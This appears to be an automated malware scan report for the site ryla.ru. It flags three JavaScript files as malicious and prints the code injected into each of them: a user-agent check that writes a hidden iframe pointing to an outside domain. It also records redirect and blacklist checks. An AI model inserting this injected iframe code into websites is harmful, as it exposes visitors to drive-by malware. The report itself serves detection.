Scanned pages/files
Request | Server response | Status |
http://ryla.ru/ | 200 OK Content-Length: 32996 Content-Type: text/html | clean |
http://ryla.ru/js/JsHttpRequest.js | 200 OK Content-Length: 57661 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://opilaket.alam-xp.info/triy _4e.submit(); _57(_4e,sv); for(var i=0;i<qt.length;i++){ _4e.lastChild.parentNode.removeChild(_4e.lastChild); } if(!_4f){ for(var i=0,n=_4e.elements.length;i<n;i++){ _4e.elements[i].name=_60[i]; } } }; JsHttpRequest.setTimeout(_5f,100); return null; }; }}; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://ryla.ru/js/functions.js | 200 OK Content-Length: 41210 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://opilaket.alam-xp.info/triy dhshowautohelp = false; if(document.getElementById('autohelp_rows_big')) document.getElementById('autohelp_rows_big').style.display = 'none'; if(document.getElementById('autohelp_rows_width')) document.getElementById('autohelp_rows_width').style.display = 'none'; if(document.getElementById('autohelp_rows')) document.getElementById('autohelp_rows').style.display'no'none'; };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://ryla.ru/js/ajax-poller.js | 200 OK Content-Length: 42778 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://opilaket.alam-xp.info/triy { var ajaxIndex = ajaxObjects.length; ajaxObjects[ajaxIndex] = new sack(); ajaxObjects[ajaxIndex].requestFile = serSirSideFile + '?pollId=' + pollId; prepareForPollResults(pollId); ajaxObjects[ajaxIndex].onCompletion = function(){ showVoteResults(pollId,ajaxIndex); }; ajaxObjects[ajaxIndex].runAJAX(); } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://ryla.ru/randomwords/randwordsjs1.php | 200 OK Content-Length: 137 Content-Type: text/html | clean |
http://ryla.ru/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://ryla.ru/randomwords/randwordsjs.php | 200 OK Content-Length: 99 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ryla.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Jun 2014 21:28:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=3463792c91536687ec51dc82b2db5878; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: ryla.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Jun 2014 21:28:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=3463792c91536687ec51dc82b2db5878; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: ryla.ru
Referer: http://www.google.com/search?q=ryla.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ryla.ru
Referer: http://www.google.com/search?q=ryla.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ryla.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ryla.ru/
Result: ryla.ru is not infected or malware details are not published yet.
Result: ryla.ru is not infected or malware details are not published yet.